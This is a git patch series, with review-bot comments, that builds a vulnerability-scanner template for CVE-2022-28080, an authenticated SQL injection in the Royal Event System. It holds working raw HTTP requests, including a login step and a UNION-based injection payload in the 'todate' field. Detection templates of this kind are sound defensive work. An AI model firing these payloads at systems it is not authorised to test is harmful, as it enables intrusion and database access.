From b15a183de2e4626cd716199324aaba2a79f39a7c Mon Sep 17 00:00:00 2001
From: lucasljm2001
Date: Wed, 15 Jun 2022 16:56:31 -0300
Subject: [PATCH 1/7] Create CVE-2022-28080.yaml
---
cves/2022/CVE-2022-28080.yaml | 53 +++++++++++++++++++++++++++++++++++
1 file changed, 53 insertions(+)
create mode 100644 cves/2022/CVE-2022-28080.yaml
diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml
new file mode 100644
index 0000000000..e0d4206e47
--- /dev/null
+++ b/cves/2022/CVE-2022-28080.yaml
@@ -0,0 +1,53 @@ +id: CVE-2022-28080 + +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause + severity: high + description: Detects an SQL Injection vulnerability in Royal Event System + tags: cve,cve2022,sqli + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + +requests: + - raw: + - | + POST /royal_event/btndates_report.php#?= HTTP/1.1 + Host: {{Host}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Cache-Control: no-cache + Content-Length: 334 + Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 + Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="todate" + + -'select SomeRandomText from tbladmin-- + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="search" + + 3 + --f289a6438bcc45179bcd3eb7ddc555d0 + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + --f289a6438bcc45179bcd3eb7ddc555d0-- + + + matchers: + - type: word + words: + - "SomeRandomText" + + - type: status + status: + - 200 \ No newline at end of file From 131f5fe7a526c3371c8d0305c74f5765cd77d557 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Jun 2022 09:30:35 +0530 Subject: [PATCH 2/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index e0d4206e47..9209586aa1 100644 
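Review bot: The two matchers at the end of the hunk have no `matchers-condition`, so they are combined with the engine's default `or`, and a plain HTTP 200 from `btndates_report.php` is enough to flag the host regardless of whether the word matcher fires. Add `matchers-condition: and` above `matchers:` at the same indentation so both conditions must hold. The request line also carries a browser-copied fragment, `POST /royal_event/btndates_report.php#?= HTTP/1.1`; `#?=` is not part of an HTTP request target and should be dropped here and in the `Referer` header. `Content-Length: 334` is hard-coded for a body the template fixes; it is safer to omit the header and let the engine compute the length.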
--- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -4,15 +4,16 @@ info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause severity: high - description: Detects an SQL Injection vulnerability in Royal Event System - tags: cve,cve2022,sqli + description: | + Detects an SQL Injection vulnerability in Royal Event System reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 + tags: cve,cve2022,sqli,authenticated requests: - raw: @@ -50,4 +51,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 3f0dcae959c94a36b0fdf7a6ce3b7dd7feb9f633 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Jun 2022 09:31:27 +0530 Subject: [PATCH 3/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 9209586aa1..ecbc92f897 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -16,8 +16,8 @@ info: tags: cve,cve2022,sqli,authenticated requests: - - raw: - - | + - raw: + - | POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: {{Host}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 @@ -28,7 +28,7 @@ requests: Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 - + --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" From 201c321f9d38aec2a5f455cf188d13a04ecd630b Mon Sep 17 00:00:00 2001 
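Review bot: The `authenticated` tag added to `tags:` in the `@@ -4,15 +4,16 @@` hunk is not backed by anything in the template: the file still contains only the single POST to `btndates_report.php`, with no login request and no session cookie, so against a host that rejects anonymous access the check presumably never fires and produces a silent negative. Either add the login step the tag implies or state the precondition in `description:`, e.g. `Requires valid Royal Event credentials supplied at run time.` The `@@ -50,4 +51,4 @@` hunk only restores the trailing newline, and the two hunks of the following patch are whitespace-only.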
From: lucasljm2001 Date: Thu, 16 Jun 2022 10:09:04 -0300 Subject: [PATCH 4/7] Added cookie-reuse --- cves/2022/CVE-2022-28080.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index e0d4206e47..d74994e9ac 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -42,6 +42,7 @@ requests: 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0-- + cookie-reuse: true matchers: - type: word From fb507906858ed210336eb7d34fa8a193831b21cd Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Thu, 16 Jun 2022 10:11:28 -0300 Subject: [PATCH 5/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index a19fed4a22..1d7ad6e91f 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml @@ -43,13 +43,13 @@ requests: 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0-- - cookie-reuse: true + cookie-reuse: true - matchers: - - type: word - words: - - "SomeRandomText" + matchers: + - type: word + words: + - "SomeRandomText" - - type: status - status: - - 200 + - type: status + status: + - 200 From 8550551e12705ad688a82983c1ff3c3a08de2d90 Mon Sep 17 00:00:00 2001 From: lucasljm2001 Date: Fri, 17 Jun 2022 18:54:52 -0300 Subject: [PATCH 6/7] Added login --- cves/2022/CVE-2022-28080.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 1d7ad6e91f..555a81ec0c 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml 
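Review bot: `cookie-reuse: true` is a no-op as added in the `@@ -42,6 +42,7 @@` hunk: the template still has a single raw request, so there is no earlier response whose `Set-Cookie` could be carried forward, and the login request that would give the option something to act on is not part of this change. The following patch changes only the indentation of this line and of the `matchers:` block, which suggests the option was also inserted at the wrong YAML level. Either add the login request in the same change or defer the option until a second request exists, and state its purpose in a comment, e.g. `# carry the session from the login request into the report request`.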
@@ -17,6 +17,42 @@ info: requests: - raw: + + - | + POST /royal_event/ HTTP/1.1 + Host: {{Host}} + Content-Length: 353 + Cache-Control: max-age=0 + sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" + sec-ch-ua-mobile: ?0 + sec-ch-ua-platform: "Windows" + Upgrade-Insecure-Requests: 1 + Origin: {{Scheme}}://{{Host}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: navigate + Sec-Fetch-User: ?1 + Sec-Fetch-Dest: document + Referer: {{Scheme}}://{{Host}}/royal_event/ + Accept-Encoding: gzip, deflate + Accept-Language: es-ES,es;q=0.9 + Connection: close + + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundary841M7QIgh7rqLsVh + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundary841M7QIgh7rqLsVh-- - | POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: {{Host}} From caf26c0f50b33549127ab1202456f15a03b7e1b7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 22 Jun 2022 11:33:57 +0530 Subject: [PATCH 7/7] Update CVE-2022-28080.yaml --- cves/2022/CVE-2022-28080.yaml | 90 +++++++++++++---------------------- 1 file changed, 34 insertions(+), 56 deletions(-) diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml index 555a81ec0c..9ef9f47616 100644 --- a/cves/2022/CVE-2022-28080.yaml +++ b/cves/2022/CVE-2022-28080.yaml 
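Review bot: `Content-Length: 353` is hard-coded in the new login request while its body interpolates `{{username}}` and `{{password}}`, whose lengths are unknown when the template is written; the header cannot be right for arbitrary credentials, so it is at best ignored by the engine and at worst breaks the request, and should be dropped so the engine computes the length. `{{username}}` and `{{password}}` are not declared in a `variables:` block and nothing in the template says where they come from; the `description:` should state that they must be supplied as run-time variables. The browser-captured headers (`sec-ch-ua*`, `Sec-Fetch-*`, `Upgrade-Insecure-Requests`, `Cache-Control`, `Connection`) add nothing to the check and make the request harder to read; `Host` and `Content-Type` are sufficient. The enclosing `requests:` block continues past the end of the hunk.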
@@ -2,90 +2,68 @@ id: CVE-2022-28080 info: name: Royal Event - SQL Injection - author: lucasljm2001,ekrause + author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Detects an SQL Injection vulnerability in Royal Event System reference: + - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 - tags: cve,cve2022,sqli,authenticated + tags: cve,cve2022,sqli,authenticated,cms,royalevent requests: - - raw: - + - raw: - | POST /royal_event/ HTTP/1.1 - Host: {{Host}} - Content-Length: 353 - Cache-Control: max-age=0 - sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102" - sec-ch-ua-mobile: ?0 - sec-ch-ua-platform: "Windows" - Upgrade-Insecure-Requests: 1 - Origin: {{Scheme}}://{{Host}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary841M7QIgh7rqLsVh - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: navigate - Sec-Fetch-User: ?1 - Sec-Fetch-Dest: document - Referer: {{Scheme}}://{{Host}}/royal_event/ - Accept-Encoding: gzip, deflate - Accept-Language: es-ES,es;q=0.9 - Connection: close + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="username" + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" - {{username}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="password" + {{username}} + 
------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" - {{password}} - ------WebKitFormBoundary841M7QIgh7rqLsVh - Content-Disposition: form-data; name="login" + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" - ------WebKitFormBoundary841M7QIgh7rqLsVh-- + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | - POST /royal_event/btndates_report.php#?= HTTP/1.1 - Host: {{Host}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Cache-Control: no-cache - Content-Length: 334 - Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 - Referer: {{Scheme}}://{{Host}}/royal_event/btndates_report.php#?= - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" - -'select SomeRandomText from tbladmin-- - --f289a6438bcc45179bcd3eb7ddc555d0 + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 - --f289a6438bcc45179bcd3eb7ddc555d0 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 - --f289a6438bcc45179bcd3eb7ddc555d0-- + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- - cookie-reuse: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' - matchers: - - type: word - words: - - "SomeRandomText" - - - type: status - status: - - 200 + - type: 
status + status: + - 200
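Review bot: `Content-Length: 353` survives the rewrite of the login request (the `+ Content-Length: 353` line near the top of the hunk) even though the body still interpolates `{{username}}` and `{{password}}`; the value cannot match arbitrary credentials, and the rewritten report request correctly omits the header, so drop it here as well for consistency. The two credential variables remain undeclared and undocumented although the template now depends on them; the `description:` block should say so, e.g. `Requires valid Royal Event credentials passed as the username and password template variables.` With `matchers-condition: and` and a per-run `{{randstr}}` marker in place, a bare HTTP 200 no longer produces a match, which resolves the false-positive path present since the first patch.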